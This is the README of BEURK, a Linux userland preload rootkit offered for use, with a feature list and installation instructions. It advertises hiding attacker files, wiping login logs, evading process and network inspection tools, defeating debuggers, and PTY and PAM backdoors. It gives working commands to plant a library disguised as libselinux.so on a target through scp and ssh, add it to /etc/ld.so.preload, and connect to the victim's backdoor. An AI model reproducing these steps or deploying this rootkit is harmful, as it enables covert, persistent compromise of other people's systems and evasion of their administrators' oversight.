Getting Started | API Documentation | Contributing | TODO List
BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.
S'ils savaient, ils vomiraient ...
- The core team -
- Hide attacker files and directories
- Realtime log cleanup (on utmp/wtmp)
- Anti process and login detection
- Bypass unhide, lsof, ps, ldd, netstat analysis
- Furtive PTY backdoor client
- ptrace(2) hooking for anti-debugging
- libpcap hooking undermines local sniffers
- PAM backdoor for local privilege escalation
- Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
- Install
scp libselinux.so [email protected]:/lib/
ssh [email protected] 'echo /lib/libselinux.so >> /etc/ld.so.preload'
- Enjoy !
./client.py victim_ip:port # connect with furtive backdoor
The following packages are not required in order to build BEURK at the moment:
- libpcap - to avoid local sniffing
- libpam - for local PAM backdoor
- libssl - for encrypted backdoor connection
Example on debian:
apt-get install libpcap-dev libpam-dev libssl-dev
- BEURK v 1.0 is in active development, please checkout current development branch.
NOTE: BEURK is a recursive acronym for BEURK Experimental Unix Root Kit